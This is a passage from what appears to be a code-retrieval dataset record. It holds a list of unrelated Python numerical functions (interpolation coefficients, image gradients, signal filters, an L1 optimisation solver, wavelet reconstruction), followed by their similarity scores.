(1.07233 * yy ** 3) - (5.38434 * yy ** 4) - \\\n (0.62251 * yy ** 5) + (5.30260 * yy ** 6) - \\\n (2.09002 * yy ** 7)\n\n # Calculate the long wavelength\n # 3.3 < wavenumber < 5.9 (Eq. 4a, 4b)\n idx = np.where((x > 3.3) & (x < 5.9))[0]\n xx = x[idx]\n a[idx] = 1.752 - (0.316 * xx) - (0.104/((xx - 4.67) ** 2 + 0.341))\n b[idx] = -3.090 + (1.825 * xx) + (1.206/((xx - 4.62) ** 2 + 0.263))\n\n # Calculate the longest wavelength\n # 5.9 <= wavenumber (Eq. 4a, 4b)\n idx = np.where(x >= 5.9)[0]\n xx = x[idx]\n a[idx] = 1.752 - (0.316 * xx) - (0.104/((xx - 4.67) ** 2 + 0.341)) + \\\n (-0.04473 * (xx - 5.9) ** 2) - (0.009779 * (xx - 5.9) ** 3)\n b[idx] = -3.090 + (1.825 * xx) + (1.206/((xx - 4.62) ** 2 + 0.263)) + \\\n (0.2130 * (xx - 5.9) ** 2) + (0.1207 * (xx - 5.9) ** 3)\n\n # A(lam) / A(V), from Eq. 
1\n extinction = a + b/Rv\n\n # Now, want to produce A_lambda / AKs, to match other laws\n k_ind = np.where(abs(x-0.46) == min(abs(x-0.46)))\n Aks_Av = a[k_ind] + b[k_ind]/Rv # Aks / Av\n Av_Aks = 1.0 / Aks_Av # Av / Aks\n \n output = extinction * Av_Aks # (A(lamb) / Av) * (Av / Aks) = (A(lamb) / Aks)\n\n return output", "def find_coefficients(self):\n self.make_matrix()\n self.coeffs = np.linalg.solve(self.global_matrix,self.global_vector)\n self.coeffs = np.append(self.coeffs, self.D) #Initial condition", "def L2_func(x):\n return K.expand_dims(K.sqrt(K.sum(K.pow(x,2), axis=1)))", "def coefficients_to_slip(x, y, a):\n partials = np.zeros((x.size, 3))\n partials[:, 0] = (x / a) * (9 * (x / a) / 8 - 3 / 4)\n partials[:, 1] = (1 - 3 * (x / a) / 2) * (1 + 3 * (x / a) / 2)\n partials[:, 2] = (x / a) * (9 * (x / a) / 8 + 3 / 4)\n slip = partials @ y\n return slip", "def index2lpol(coeffs, index):\n n = max(index)\n ar = np.zeros(n + 1)\n ar[index] = coeffs\n return ar", "def beta_gen_lasso(p):\n cardi = 0.005\n return np.array([0]*int(p-int(cardi*p)) + [1]*int(cardi*p))", "def _l1m_objective(a,X,*args):\n \n return(np.sum(np.apply_along_axis(_euclidnorm,1,_diffmat_objective(a,X))))", "def imageGradient( iImage ):\n iImage = np.array( iImage, dtype='float' ) \n iSobel = np.array( ((-1,0,1),(-2,0,2),(-1,0,1)) ) \n oGx = ni.convolve( iImage, iSobel, mode='nearest' )\n oGy = ni.convolve( iImage, np.transpose( iSobel ), mode='nearest' )\n return oGx, oGy", "def get_proj_coeffs(self, src):\n self.proj_coeffs = parallel.call_and_bcast(self.get_array, src)", "def test_lfilter_simple(self):\n\n waveform = torch.rand(2, 44100 * 1, dtype=self.dtype, device=self.device)\n b_coeffs = torch.tensor([0, 0, 0, 1], dtype=self.dtype, device=self.device)\n a_coeffs = torch.tensor([1, 0, 0, 0], dtype=self.dtype, device=self.device)\n output_waveform = F.lfilter(waveform, a_coeffs, b_coeffs)\n\n self.assertEqual(output_waveform[:, 3:], waveform[:, 0:-3], atol=1e-5, rtol=1e-5)", "def trend_filter(rets_data, lambda_value):\r\n #USING CVXPY convex optimiser\r\n n_periods = rets_data.shape[0]\r\n rets = rets_data.to_numpy()\r\n\r\n D_full = np.diag([1]*n_periods) - np.diag([1]*(n_periods-1), 1)\r\n D = D_full[0:n_periods-1,]\r\n beta = cp.Variable(n_periods)\r\n lambd = cp.Parameter(nonneg=True)\r\n lambd.value = lambda_value\r\n\r\n def lasso_min(betas, rets, lambd):\r\n return cp.norm(rets-betas, 2)**2 + lambd*cp.norm(cp.matmul(D, betas), 1)\r\n\r\n problem = cp.Problem(cp.Minimize(lasso_min(beta, rets, lambd)))\r\n problem.solve()\r\n\r\n # NOT WORKING\r\n # n_periods = rets_data.shape[0]\r\n # D_full = np.diag([1] * n_periods) - np.diag([1] * (n_periods - 1), 1)\r\n # D = D_full[0:n_periods - 1, ]\r\n # def lasso_min(betas, rets, D, lambda_value):\r\n # return np.linalg.norm(rets-betas)**2 + lambda_value*np.linalg.norm(D@betas,1)\r\n #\r\n # init_guess = np.repeat(1/n_periods, n_periods)\r\n # bounds = Bounds(lb=0.0, ub=1.0)\r\n # results = minimize(fun=lasso_min,\r\n # args=(rets_data, D, lambda_value),\r\n # x0=init_guess,\r\n # bounds=bounds,\r\n # method='SLSQP',\r\n # options={'disp':False})\r\n # betas = pd.Series(results.x, index=rets_data.index)\r\n # return betas\r\n betas = pd.DataFrame(beta.value, index=rets_data.index.to_timestamp(), columns=['drift'])\r\n return betas", "def _get_coeffs(self):\n # lift (Clmax) and parasitic drag (Cd0max)\n self.cl = 0.0\n self.cd = 0.0\n kpp = 0.0\n\n for sail in self.sails:\n\n self.cl += sail.cl(self.awa) * sail.area * sail.bk\n self.cd += sail.cd(self.awa) * 
sail.area * sail.bk\n kpp += sail.cl(self.awa) ** 2 * sail.area * sail.bk * sail.kp\n\n self.cl /= self.area\n self.cd /= self.area\n\n # viscous quadratic parasitic drag and induced drag\n devisor_1 = self.area * self.cl ** 2\n devisor_2 = np.pi * self._heff(self.awa) ** 2\n self.CE = (kpp / devisor_1 if devisor_1 else 0.0) + (self.area / devisor_2 if devisor_2 else 0.0)\n\n # fraction of parasitic drag due to jib\n self.fcdj = 0.0\n for sail in self.sails:\n if sail.type == \"jib\":\n self.fcdj = (\n sail.bk * sail.cd(self.awa) * sail.area / (self.cd * self.area)\n )\n\n # final lift and drag\n self.cd = self.cd * (\n self.flat * self.fcdmult(self.flat) * self.fcdj + (1 - self.fcdj)\n ) + self.CE * self.cl ** 2 * self.flat ** 2 * self.fcdmult(self.flat)\n self.cl = self.flat * self.cl", "def filter_gradient(self):\n error = self.error()\n error_shape = error.shape[1:3]\n input_ = self.get_cache('input')\n h = input_.shape[1]\n w = input_.shape[2]\n # TODO: check that this padding is correct. I am not sure it gets it right when the number of 0s to add is odd.\n pad_l, pad_t = (error_shape[0] - 1) // 2, (error_shape[1] - 1) // 2\n pad_r, pad_b = (error_shape[0] - 1) - pad_l, (error_shape[1] - 1) - pad_t\n padded_input = np.pad(input_, ((0, 0), (pad_l, pad_r), (pad_t, pad_b), (0, 0)), 'constant')\n # TODO: this assumes 'same' padding. support other types.\n # TODO: I wanted to use np.from_function but kept getting an IndexError, so we'll use a nested for loop for now\n grads = np.zeros(self.filter.shape)\n for m in range(grads.shape[0]):\n for n in range(grads.shape[1]):\n for k in range(grads.shape[2]):\n for r in range(grads.shape[3]):\n grads[m, n, k, r] = np.sum(error[:, :, :, r] * padded_input[:, m: m + h, n: n + w, k])\n return grads", "def pchip_coeffs_1_nonan(X, Y):\n\n return _pchip_coeffs_1(X, Y, 0, X.size)", "def LEIsotropic2D(self):\n const = self.ymod / ((1+self.Nu) * (1-(2*self.Nu)))\n a = const * self.Nu\n b = const * (1-self.Nu)\n c = const * 0.5 * (1-2*self.Nu)\n Cmat = np.array(\n [\n [b, a, 0],\n [a, b, 0],\n [0, 0, c],\n ], dtype=float)\n stress_el = Cmat @ self.eps\n return stress_el, Cmat", "def l1(weights):\n\treturn np.sum(np.abs(weights))", "def lfilter(taps, array, filter_centre):\n arr = array.copy()\n left_pad_len = len(taps) - filter_centre - 1\n right_pad_len = filter_centre\n arr = np.concatenate(\n (array[1:1+left_pad_len][::-1], array,\n array[-right_pad_len-1:-1][::-1]))\n return np.convolve(arr, taps[::-1], 'valid')", "def _corr1d_0(input, filter, output, wrap=True, cval=0.0):\n #3 loops: rows, cols, filter along rows\n rows, cols = input.shape\n N = len(filter)\n n = N//2\n #access scans whole col of output at once for better cache coherency\n for r in range(rows):\n for c in prange(cols):\n output[r,c] = 0\n for i in range(N):\n j = r-n+i\n if wrap:\n j %= rows\n if j >= 0 and j < rows:\n output[r,c] += input[j,c]*filter[i]\n else:\n output[r,c] += cval*filter[i]\n return output", "def coeffs(f):\n return dmp_coeffs(f.rep, f.lev, f.dom)", "def coefficients(self) -> np.ndarray:\n return self._coefficients", "def _pchip_coeffs_i(X, Y, i):\n\n # Pre-assign sizes for PCHIP variables.\n h = [0.0, 0.0, 0.0]\n δ = [0.0, 0.0, 0.0]\n d = [0.0, 0.0]\n\n # Check whether x is adjacent to the start or end of this X\n at_start = (i == 0) or np.isnan(X[i - 1] + Y[i - 1])\n at_end = (i == len(X) - 2) or np.isnan(X[i + 2] + Y[i + 2])\n\n if at_start and at_end:\n\n # if np.isnan(X[i + 1]) or np.isnan(Y[i + 1]):\n # # Only one valid data point. 
Leave the interpolant as NaN.\n # d[0], c, b = np.nan, np.nan, np.nan\n\n # else:\n\n # ||| X[0] <= x <= X[1] ||| Revert to Linear Interpolation\n # If actually only one non-NaN data point, then d[0] will be NaN, so\n # interpolant will evaluate to NaN.\n d[0] = (Y[i + 1] - Y[i]) / (X[i + 1] - X[i])\n C3, C2 = 0.0, 0.0\n\n else:\n if at_start:\n # ||| X[0] <= x <= X[1] < X[2] --->\n h[1] = X[i + 1] - X[i]\n h[2] = X[i + 2] - X[i + 1]\n δ[1] = (Y[i + 1] - Y[i]) / h[1]\n δ[2] = (Y[i + 2] - Y[i + 1]) / h[2]\n\n # Noncentered, shape-preserving, three-point formula:\n d[0] = ((2.0 * h[1] + h[2]) * δ[1] - h[1] * δ[2]) / (h[1] + h[2])\n if np.sign(d[0]) != np.sign(δ[1]):\n d[0] = 0.0\n elif (np.sign(δ[1]) != np.sign(δ[2])) and (\n np.abs(d[0]) > np.abs(3.0 * δ[1])\n ):\n d[0] = 3.0 * δ[1]\n\n # Standard PCHIP formula\n if np.sign(δ[1]) * np.sign(δ[2]) > 0.0:\n w1 = 2.0 * h[2] + h[1]\n w2 = h[2] + 2.0 * h[1]\n d[1] = (w1 + w2) / (w1 / δ[1] + w2 / δ[2])\n else:\n d[1] = 0.0\n\n elif at_end:\n # <--- X[i-1] < X[i] < x <= X[i+1] |||\n h[0] = X[i] - X[i - 1]\n h[1] = X[i + 1] - X[i]\n δ[0] = (Y[i] - Y[i - 1]) / h[0]\n δ[1] = (Y[i + 1] - Y[i]) / h[1]\n\n # Standard PCHIP formula\n if np.sign(δ[0]) * np.sign(δ[1]) > 0.0:\n w1 = 2.0 * h[1] + h[0]\n w2 = h[1] + 2.0 * h[0]\n d[0] = (w1 + w2) / (w1 / δ[0] + w2 / δ[1])\n else:\n d[0] = 0.0\n\n # Noncentered, shape-preserving, three-point formula:\n d[1] = ((h[0] + 2.0 * h[1]) * δ[1] - h[1] * δ[0]) / (h[0] + h[1])\n if np.sign(d[1]) != np.sign(δ[1]):\n d[1] = 0.0\n elif (np.sign(δ[1]) != np.sign(δ[0])) and (\n np.abs(d[1]) > np.abs(3 * δ[1])\n ):\n\n d[1] = 3.0 * δ[1]\n\n else:\n # <--- X[i-1] < X[i] < x <= X[i+1] < X[i+2] --->\n h[0] = X[i] - X[i - 1] # Way faster to do this\n h[1] = X[i + 1] - X[i] # than\n h[2] = X[i + 2] - X[i + 1] # diff(X(i-1:i+3))\n δ[0] = (Y[i] - Y[i - 1]) / h[0]\n δ[1] = (Y[i + 1] - Y[i]) / h[1]\n δ[2] = (Y[i + 2] - Y[i + 1]) / h[2]\n\n # Standard PCHIP formula\n for j in range(2):\n if np.sign(δ[j]) * np.sign(δ[j + 1]) > 0.0:\n w1 = 2.0 * h[j + 1] + h[j]\n w2 = h[j + 1] + 2.0 * h[j]\n d[j] = (w1 + w2) / (w1 / δ[j] + w2 / δ[j + 1])\n else:\n d[j] = 0.0\n\n # Polynomial coefficients for this piece\n dzzdx = (δ[1] - d[0]) / h[1]\n dzdxdx = (d[1] - δ[1]) / h[1]\n C3 = (dzdxdx - dzzdx) / h[1] # coeff of the 3rd degree term (x^3)\n C2 = 2 * dzzdx - dzdxdx # coeff of 2nd degree term (x^2)\n\n # The following code evaluates the `d`'th deriviative of the cubic\n # interpolant at `x`.\n # s = x - X[i]\n # if d == 0:\n # y = Y[i] + s * (d[0] + s * (C2 + s * C3))\n # elif d == 1: # first derivative\n # y = d[0] + s * (2 * C2 + 3 * s * C3)\n # elif d == 2: # second derivative\n # y = 2 * C2 + 6 * s * C3\n # elif d == 3: # third derivative\n # y = 6 * C3\n # else:\n # y = 0.0\n # return y\n\n # Faster to return tuple than build an np.array just to deconstruct it later\n return C3, C2, d[0], Y[i]", "def waverec(coeffs: list, wavelet: pywt.Wavelet) -> torch.Tensor:\n _, _, rec_lo, rec_hi = get_filter_tensors(\n wavelet, flip=False, device=coeffs[-1].device,\n dtype=coeffs[-1].dtype\n )\n filt_len = rec_lo.shape[-1]\n filt = torch.stack([rec_lo, rec_hi], 0)\n\n res_lo = coeffs[0]\n for c_pos, res_hi in enumerate(coeffs[1:]):\n res_lo = torch.stack([res_lo, res_hi], 1)\n res_lo = torch.nn.functional.conv_transpose1d(\n res_lo, filt, stride=2).squeeze(1)\n\n # remove the padding\n padl = (2 * filt_len - 3) // 2\n padr = (2 * filt_len - 3) // 2\n if c_pos < len(coeffs) - 2:\n pred_len = res_lo.shape[-1] - (padl + padr)\n nex_len = coeffs[c_pos + 
2].shape[-1]\n if nex_len != pred_len:\n padr += 1\n pred_len = res_lo.shape[-1] - (padl + padr)\n assert (\n nex_len == pred_len\n ), \"padding error, please open an issue on github \"\n if padl > 0:\n res_lo = res_lo[..., padl:]\n if padr > 0:\n res_lo = res_lo[..., :-padr]\n return res_lo", "def PrewittGradient(anImage):\n XKernel = [\n [-1,0,1],\n [-1,0,1],\n [-1,0,1]\n ]\n YKernel = [\n [-1,-1,-1],\n [0,0,0],\n [1,1,1]\n ]\n return ApplyGradientKernels(anImage, XKernel, YKernel)", "def l1(P, q):\n\n m, n = P.size\n\n # Solve equivalent LP \n #\n # minimize [0; 1]' * [u; v]\n # subject to [P, -I; -P, -I] * [u; v] <= [q; -q]\n #\n # maximize -[q; -q]' * z \n # subject to [P', -P']*z = 0\n # [-I, -I]*z + 1 = 0 \n # z >= 0 \n \n c = matrix(n*[0.0] + m*[1.0])\n h = matrix([q, -q])\n\n def Fi(x, y, alpha = 1.0, beta = 0.0, trans = 'N'): \n if trans == 'N':\n # y := alpha * [P, -I; -P, -I] * x + beta*y\n u = P*x[:n]\n y[:m] = alpha * ( u - x[n:]) + beta*y[:m]\n y[m:] = alpha * (-u - x[n:]) + beta*y[m:]\n\n else:\n # y := alpha * [P', -P'; -I, -I] * x + beta*y\n y[:n] = alpha * P.T * (x[:m] - x[m:]) + beta*y[:n]\n y[n:] = -alpha * (x[:m] + x[m:]) + beta*y[n:]\n\n\n def Fkkt(W): \n\n # Returns a function f(x, y, z) that solves\n #\n # [ 0 0 P' -P' ] [ x[:n] ] [ bx[:n] ]\n # [ 0 0 -I -I ] [ x[n:] ] [ bx[n:] ]\n # [ P -I -W1^2 0 ] [ z[:m] ] = [ bz[:m] ]\n # [-P -I 0 -W2 ] [ z[m:] ] [ bz[m:] ]\n #\n # On entry bx, bz are stored in x, z.\n # On exit x, z contain the solution, with z scaled (W['di'] .* z is\n # returned instead of z). \n\n d1, d2 = W['d'][:m], W['d'][m:]\n D = 4*(d1**2 + d2**2)**-1\n A = P.T * spdiag(D) * P\n lapack.potrf(A)\n\n def f(x, y, z):\n\n x[:n] += P.T * ( mul( div(d2**2 - d1**2, d1**2 + d2**2), x[n:]) \n + mul( .5*D, z[:m]-z[m:] ) )\n lapack.potrs(A, x)\n\n u = P*x[:n]\n x[n:] = div( x[n:] - div(z[:m], d1**2) - div(z[m:], d2**2) + \n mul(d1**-2 - d2**-2, u), d1**-2 + d2**-2 )\n\n z[:m] = div(u-x[n:]-z[:m], d1)\n z[m:] = div(-u-x[n:]-z[m:], d2)\n\n return f\n\n\n # Initial primal and dual points from least-squares solution.\n\n # uls minimizes ||P*u-q||_2; rls is the LS residual.\n uls = +q\n lapack.gels(+P, uls)\n rls = P*uls[:n] - q \n\n # x0 = [ uls; 1.1*abs(rls) ]; s0 = [q;-q] - [P,-I; -P,-I] * x0\n x0 = matrix( [uls[:n], 1.1*abs(rls)] ) \n s0 = +h\n Fi(x0, s0, alpha=-1, beta=1) \n\n # z0 = [ (1+w)/2; (1-w)/2 ] where w = (.9/||rls||_inf) * rls \n # if rls is nonzero and w = 0 otherwise.\n if max(abs(rls)) > 1e-10: \n w = .9/max(abs(rls)) * rls\n else: \n w = matrix(0.0, (m,1))\n z0 = matrix([.5*(1+w), .5*(1-w)])\n\n dims = {'l': 2*m, 'q': [], 's': []}\n sol = solvers.conelp(c, Fi, h, dims, kktsolver = Fkkt, \n primalstart={'x': x0, 's': s0}, dualstart={'z': z0})\n return sol['x'][:n]", "def grad_chol(L):\n n = len(L)\n I = np.eye(n)\n s1 = I[:, None, :, None] * L[None, :, None, :]\n s2 = I[None, :, :, None] * L[:, None, None, :]\n return (s1 + s2).reshape(2 * (n**2,))", "def smooth_wcoeffs(coeffs,order=1):\n from copy import deepcopy\n coeffs_new=deepcopy(coeffs)\n\n for j in range(1,order+1):\n # create a list of three zero arrays\n czero=tuple(zeros(coeffs[-j][i].shape) for i in range(3))\n # to replace detailed coeffs with zeros\n coeffs_new[-j]=czero\n\n return coeffs_new", "def linear_coefficient(self):\n if self._epsilon.size == 1:\n return np.full((cfg.Nx, cfg.Ny), self._epsilon.get_h(), dtype = cfg.dtype)\n else:\n return self._epsilon.get_h()", "def kalman_filter1(old_state, new_state, input_valid = True):\n state = np.zeros(6)\n if input_valid:\n state[0:3] = 
POS_COEF1 * new_state \\\n + (1 - POS_COEF1) * (old_state[0:3] + old_state[3:6] * TIME_INTERVAL)\n # print new_state, old_state[0:3]\n friction = -FRICTION*np.linalg.norm(old_state[3:6])*old_state[3:6]\n state[3:6] = VEL_COEF1 * (new_state - old_state[0:3]) / TIME_INTERVAL \\\n + (1 - VEL_COEF1) * (old_state[3:6] - (GRAVITY - friction) * TIME_INTERVAL)\n else:\n state[0:3] = old_state[0:3] + old_state[3:6] * TIME_INTERVAL\n friction = -FRICTION*np.linalg.norm(old_state[3:6])*old_state[3:6]\n state[3:6] = old_state[3:6] - (GRAVITY - friction) * TIME_INTERVAL\n return state", "def get_cl(self, lbins, w=None):\n return spec.rcfft2cl(lbins, self, w=w)", "def calc_xi(self):\n\t\n\tk_dot_x = self.k[0]*self.x[0,:,:] + self.k[1]*self.x[1,:,:] + self.k[2]*self.x[2,:,:]\n\n\tself.xi = self.t.reshape((1,self.N)) - k_dot_x/l.Clight\n\n\treturn" ]
[ "0.63450897", "0.59707314", "0.56549406", "0.5654393", "0.56457824", "0.5604039", "0.55629796", "0.554021", "0.55173355", "0.55153257", "0.54377836", "0.54277223", "0.5426681", "0.53971505", "0.538953", "0.5377202", "0.5352815", "0.53502446", "0.534966", "0.53384006", "0.53195107", "0.5297331", "0.52960753", "0.528895", "0.52801204", "0.52752084", "0.5237084", "0.52356946", "0.5234762", "0.522277", "0.5221076", "0.5212501", "0.5207456", "0.5198997", "0.5197461", "0.51961046", "0.5181431", "0.518138", "0.5169238", "0.5160548", "0.51600873", "0.51551867", "0.5153356", "0.51512206", "0.5146969", "0.51285857", "0.512726", "0.51248527", "0.51231694", "0.51131725", "0.51125926", "0.5109612", "0.5104538", "0.5102355", "0.5092578", "0.50923747", "0.5086925", "0.50788486", "0.5077776", "0.5073715", "0.5068982", "0.5061277", "0.5059737", "0.5041988", "0.5038093", "0.50327677", "0.5029589", "0.5028063", "0.5026769", "0.502567", "0.5013065", "0.50105417", "0.5004689", "0.5002814", "0.50012183", "0.50004584", "0.49971527", "0.4997029", "0.49968618", "0.4991438", "0.499074", "0.4990654", "0.49888206", "0.4987236", "0.49813083", "0.49776784", "0.49773216", "0.49729234", "0.4972047", "0.4969153", "0.49675488", "0.49662563", "0.49571362", "0.49385992", "0.49384007", "0.4933243", "0.49314108", "0.49282423", "0.4927564", "0.49218798", "0.49214894" ]
0.0
-1
r"""Function that returns Gaussian filter matrix coefficients.
def get_laplacian_kernel2d(kernel_size: int) -> torch.Tensor:
    if not isinstance(kernel_size, int) or kernel_size % 2 == 0 or \
            kernel_size <= 0:
        raise TypeError("ksize must be an odd positive integer. Got {}"
                        .format(kernel_size))

    kernel = torch.ones((kernel_size, kernel_size))
    mid = kernel_size // 2
    kernel[mid, mid] = 1 - kernel_size ** 2
    kernel_2d: torch.Tensor = kernel
    return kernel_2d
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _gaussian(self, c, sigma):\n d = 2*sigma*sigma\n ax = exp(-power(self._xx-self._xx.T[c], 2)/d)\n ay = exp(-power(self._yy-self._yy.T[c], 2)/d)\n return (ax * ay).T # the external product gives a matrix", "def apply_gaussian(X, sigma):\n return np.array([ndimage.gaussian_filter(x, sigma) for x in X])", "def gaussian_filter(x):\n return _gaussian_filter(x, 3)", "def _gaussian_distribution(self, x: ndarray, mu: float, sigma: float) -> ndarray:\n return 1 / (np.sqrt(2 * np.pi) * sigma) * np.exp(\n -np.power(\n (x - mu) / sigma, 2) / 2)", "def compute_gaussian_krnl(self, M):\n g = signal.gaussian(M, M // 3., sym=True)\n G = np.dot(g.reshape(-1, 1), g.reshape(1, -1))\n G[M // 2:, :M // 2] = -G[M // 2:, :M // 2]\n G[:M // 2, M // 2:] = -G[:M // 2, M // 2:]\n return G", "def gaussian_weight_matrix(dispersion, L):\n return np.exp(-0.5*(dispersion[:,None]-dispersion[None,:])**2/L**2)", "def estimate_multi_gaussian(X):\n m, n = X.shape\n mu = mean(X, axis=0)\n sigma = cov_matrix(X, mu)\n\n return mu, sigma", "def estimate_gaussian_params(X):\n mu = X.mean(axis=0)\n var = X.std(axis=0)**2.0\n return mu,var", "def multi_gaussian(X, mu, sigma):\n m, n = X.shape\n X = X - mu\n\n factor = X.dot(inv(sigma))\n factor = multiply(factor, X)\n factor = - (1 / 2) * sum(factor, axis=1, keepdims=True)\n\n p = 1 / (power(2 * pi, n / 2) * sqrt(det(sigma)))\n p = p * exp(factor)\n\n return p", "def gmm(X, k):\n mix = sklearn.mixture.GaussianMixture(n_components=k).fit(X)\n pi = mix.weights_\n m = mix.means_\n S = mix.covariances_\n clss = mix.predict(X)\n bic = mix.bic(X)\n\n return pi, m, S, clss, bic", "def gaussian_kernel_matrix(x, y, sigmas):\n\n beta = 1. / (2. * (tf.expand_dims(sigmas, 1)))\n norm = lambda x: tf.reduce_sum(tf.square(x), 1)\n dist = tf.transpose(norm(tf.expand_dims(x, 2) - tf.transpose(y)))\n s = tf.matmul(beta, tf.reshape(dist, (1, -1)))\n return tf.reshape(tf.reduce_sum(tf.exp(-s), 0), tf.shape(dist))", "def estimateGaussian(X):\n mu = X.mean(0, keepdims=True).T\n sigma2 = X.var(0, keepdims=True).T\n return mu, sigma2", "def productGaussian(mu1, C1, mu2, C2):\n Cn = C1 + mat(.0001*identity(2))\n K = Cn*linalg.inv(Cn+C2)\n mu = mu1 + K*(mu2-mu1)\n C = Cn - K*Cn\n #denom = linalg.inv(C1+C2)\n #mu = denom*(C1*mu2+C2*mu1)\n #C = C1*denom*C2\n return mu,C", "def estimateGaussian(X):\n\tmu = np.mean(X, axis=0)\n\tsigma2 = np.std(X, axis=0) ** 2\n\treturn mu, sigma2", "def _gaussian_kernel_matrix(x, y, sigmas):\n def norm(v):\n return tf.reduce_sum(tf.square(v), 1)\n beta = 1. / (2. 
* (tf.expand_dims(sigmas, 1)))\n dist = tf.transpose(norm(tf.expand_dims(x, 2) - tf.transpose(y)))\n s = tf.matmul(beta, tf.reshape(dist, (1, -1)))\n kernel = tf.reshape(tf.reduce_sum(tf.exp(-s), 0), tf.shape(dist))\n return kernel", "def _make_gaussian_matrix(\n data_count: int,\n feature_count: int,\n) -> np.ndarray:\n return np.random.randn(data_count, feature_count)", "def all_features(sigma=0.1):\n # to fill in f, array of features w shape (863, 863)\n f = np.zeros((X.shape[0], X.shape[0]))\n # iterate over every example twice to make every possible comparison\n for i in range(m):\n for j in range(m):\n f[i, j] = gaussian_kernel(X[i], X[j], sigma=sigma)\n return f", "def makeGaussianKernel(sigma: float) -> np.ndarray:\n\n # Your code here.\n kernel_size = 8*sigma+1\n kernel = np.zeros([kernel_size,kernel_size], dtype=float)\n center = kernel_size//2\n \n \n s = 2*(sigma**2)\n sum_val = 0\n for i in range(0,kernel_size):\n for j in range(0,kernel_size):\n x = i-center\n y = j-center\n kernel[i,j] = np.exp(-(x**2+y**2) / s)\n sum_val += kernel[i,j]\n #/(np.pi * s)\n sum_val = 1/sum_val\n print(\"here is the kernel\", kernel*sum_val)\n return kernel*sum_val", "def gaussian(x, amp, wid, cen):\n return amp*np.exp(-(x-cen)**2/(2*wid**2))", "def Gaussian(x, mu=0, sigma=26.4, A=1, y0=0):\r\n #width = sigma*(2*np.sqrt(2*np.log(2)))\r\n b = 1/(sigma*np.sqrt(2*np.pi))\r\n f = b*np.power(np.e, -(((x-mu)**2)/(2*sigma**2)))\r\n return A*f + y0", "def gaussian_kernel_matrix(x, y, sigmas):\n\n beta = 1. / (2. * (tf.expand_dims(sigmas, 1)))\n norm = lambda x: tf.reduce_sum(input_tensor=tf.square(x), axis=1)\n dist = tf.transpose(a=norm(tf.expand_dims(x, 2) - tf.transpose(a=y)))\n s = tf.matmul(beta, tf.reshape(dist, (1, -1)))\n return tf.reshape(tf.reduce_sum(input_tensor=tf.exp(-s), axis=0), tf.shape(input=dist))", "def fit_gaussian(self, mask=None):\n data = self.data\n mask = numpy.logical_or(mask, numpy.ma.getmaskarray(data))\n fdata = data[~mask].data\n xdata = numpy.asarray([cm[~mask]\n for cm in self.bset.cmesh]).transpose()\n scale, mean, cov = fit_ndgaussian(xdata, fdata)\n return scale, mean, cov", "def gaussian_filter(size,sigma=-1):\n\n if sigma == -1:\n sigma = np.sqrt(size)\n\n filter = np.zeros((size,size))\n\n for i,j in it.product(range(size),range(size)):\n x = j-size//2\n y = i-size//2\n filter[i,j] = 1/(2*np.pi*sigma**2) * np.exp(-(x**2+y**2)/(2*sigma**2))\n\n filter = filter/filter[0,0]\n filter = filter/filter.sum()\n\n return filter", "def create_gaussian_filter(size, sigma):\n h = size[0] #height of the template\n w = size[1] #width of the template \n if h % 2 == 0: h += 1 #add 1 if dimensions are even\n if w % 2 == 0: w += 1\n x = math.floor(h/2)\n y = math.floor(w/2) \n sum = 0\n #create our template\n template = np.zeros((h,w))\n #fill the template in with the numbers from Gaussian distribution\n for i in range(h):\n for j in range(w):\n template[i,j] = math.exp(-((((j-x)**2)+((i-y)**2))/(2*(sigma**2))))\n sum = sum + template[i,j]\n #normalise the numbers\n gaussian_filter = template/sum\n return gaussian_filter", "def uni_gaussian(X, mu, sigma2):\n p = (1 / sqrt(2 * pi * sigma2))\n p = p * exp(-power(X - mu, 2) / (2 * sigma2))\n\n def prod(x, y):\n return x * y\n p = array([[reduce(prod, el)] for el in p])\n\n return p", "def fitgaussian(self, data):\n params = self.moments(data)\n errorfunction = lambda p: ravel(self.Gauss(*p)(*indices(data.shape)) - data)\n p, success = optimize.leastsq(errorfunction, params)\n return p", "def _multivariate_gaussian(self, x, mu_k, 
sigma_k):\n return multivariate_normal.pdf(x, mu_k, sigma_k)", "def build_filter(n, sigma):\n filter_ = np.zeros((n,n))\n\n begin = n//2\n\n for i in range(n):\n for j in range(n):\n val = ((i-begin)**2 + (j-begin)**2)**0.5\n filter_[i][j] = gaussian(val, sigma)\n\n return filter_", "def gaussian(x, mu, sigma):\n return (np.exp(-(x - mu)**2 / 2.0 / sigma**2) /\n np.sqrt(2.0 * np.pi) / sigma)", "def gaussian(pars, x):\n A, b, mu, sigma = pars\n # return b + A/(np.sqrt(2*np.pi)*sigma**2) \\\n return b + A \\\n * np.exp(-.5*(x - mu)**2/sigma**2)", "def gaussian(x, amp, cen, wid):\n return amp * exp (-(x-cen)**2/(2*wid**2))", "def Gaussian_priors_func(guesses,central,invvar):\n return [-0.5 * np.dot(np.dot((guesses[i]-central[i]).T,invvar[i]),guesses[i]-central[i]) for i in range(len(central))]", "def gaussian(dims: Tuple[int, int], cutoff_freq: float) -> np.ndarray:\n # create grid\n m, n = [(dim - 1) / 2 for dim in dims]\n yy, xx = np.ogrid[-m : m + 1, -n : n + 1]\n\n # compute transfer function\n tf = np.exp(-(np.power(xx, 2) + np.power(yy, 2)) / (2 * np.power(cutoff_freq, 2)))\n\n # normalize and return transfer func\n return (tf - np.max(tf)) / (np.max(tf) - np.min(tf))", "def kernel_gaussiano(image: np.ndarray, sigma: float, kind: str = 'low') -> np.ndarray:\n U, V = fourier_meshgrid(image)\n D = fourier_distance(U, V)\n H = np.exp( (-1.0 * D) / (2.0 * sigma**2) )\n \n if kind == 'high' or kind == 'highpass':\n H = 1.0 - H\n \n return H", "def test_gaussian_filter():\n\n def rgb2gray(rgb):\n r, g, b = rgb[:, :, 0], rgb[:, :, 1], rgb[:, :, 2]\n gray = 0.2989 * r + 0.5870 * g + 0.1140 * b\n\n return gray\n\n img = rgb2gray(np.array(Image.open('data/graf.png')))\n gx, x = gauss_module.gauss(4)\n gx = gx.reshape(1, gx.shape[0])\n gy = gx.reshape(gx.shape[1], gx.shape[0])\n smooth_img = conv2(img, gx * np.array(gy))\n\n test_smooth_img = gauss_module.gaussianfilter(img, 4)\n\n assert np.all(smooth_img.round(5) == test_smooth_img.round(5))", "def Gauss_filter(data, sigma=(0,2,2), mode='wrap'): \n import scipy.ndimage.filters as flt\n return flt.gaussian_filter(data, sigma=sigma, mode=mode)", "def gaussian_blur(self,img):\n return cv2.GaussianBlur(img, (self.kernel_size, self.kernel_size), 0)", "def gaussian2d(filter_size=5, sig=1.0):\n ax = 